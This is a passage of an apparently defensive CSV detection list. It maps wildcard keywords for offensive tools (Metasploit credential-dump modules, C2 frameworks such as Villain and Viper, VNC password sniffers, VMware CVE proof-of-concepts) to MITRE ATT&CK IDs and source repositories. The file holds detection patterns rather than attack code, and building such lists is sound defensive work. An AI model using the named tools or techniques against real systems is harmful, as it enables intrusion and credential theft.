It is compatible with both 32 bits and 64 bits versions of Microsoft Office 2010 and above.","T1055 - T1218 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/itm4n/VBA-RunPE","1","0","N/A","N/A","8","777","189","2019-12-17T10:32:43Z","2018-01-28T19:50:44Z" +"*vba-windows-persistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*vbs-obfuscator.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*VbulletinWidgetTemplateRce.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*vcenter_forge_saml_token*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcenter_secrets_dump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*vcsmap*","offensive_tool_keyword","vcsmap","vcsmap is a plugin-based tool to scan public version control systems (currently GitHub and possibly Gitlab soon) for sensitive information like access tokens and credentials.","T1210.001 - T1190 - T1538","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/melvinsh/vcsmap","1","0","N/A","N/A","2","131","25","2021-08-31T20:47:07Z","2016-08-21T11:23:57Z" +"*vdi2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*vectra-ai-research/MAAD-AF*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*veeam_credential_dump.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*veeam_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*veeam_dump_mssql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool 
that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*veeam_dump_postgresql.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Vegile -*","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","0","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" +"*venv wapiti3*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*Verified Merlin server *","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*verovaleros/domain_analyzer*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*victim_host_generator.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*VID_03EB&PID_2403 *","offensive_tool_keyword","ducky","rubber ducky","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","default vid and pid of the device - risk of 
false positives","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z" +"*VID_0483&PID_5740*","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007 - TA0044","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","default vid and pid of the device - risk of false positives","10","10","N/A","N/A","N/A","N/A" +"*viewdns-get-rootdomains-ip-ns *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*viewdns-get-rootdomains-whois *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*Villain.git*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*Villain/Core*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*villain_core.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*vincent.letoux@gmail.com*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*viper/*.sock*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viper-dev.conf*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperpython-dev*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - 
T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperpython-main*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*viperzip.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*virajkulkarni14*","offensive_tool_keyword","Github Username","github repo username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/virajkulkarni14","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Viralmaniar*","offensive_tool_keyword","Github Username","github username hosting post exploitation tools and recon tools","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Viralmaniar","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*VirTool:Win32/RemoteExec*","signature_keyword","Antivirus Signature","AV signature often associated with C2 communications (cobaltstrike for example)","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*virusscan_bypass.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*VirusTotalC2.*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure.
now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z"
+"*Visual-Studio-BOF-template*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z"
+"*VITE_STRIKER_API*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 -
TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z"
+"*vivaldi* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A"
+"*vivaldi.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A"
+"*VMSA-2023-0001.py*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z"
+"*vmware_view_planner*uploadlog_rce*","offensive_tool_keyword","metasploit","Metasploit is a widely-used.
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vmware_vrni_rce_cve_2023_20887.rb*","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z"
+"*vmware_workspace_one_access_cve_*.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*VMware-vRealize-Log-Insight.cert*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log
Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z"
+"*vmx2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*vnc_password_osx.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vnc_passwords.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vncdumpdll*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vncinject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development.
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*vncpcap2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*vncpwdump.*","offensive_tool_keyword","vncpwdump","vnc password sniffer","T1003.003 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://www.codebus.net/d-2v0u.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vncviewer *.*:5901*","greyware_tool_keyword","vncviewer","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*vnperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous.
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
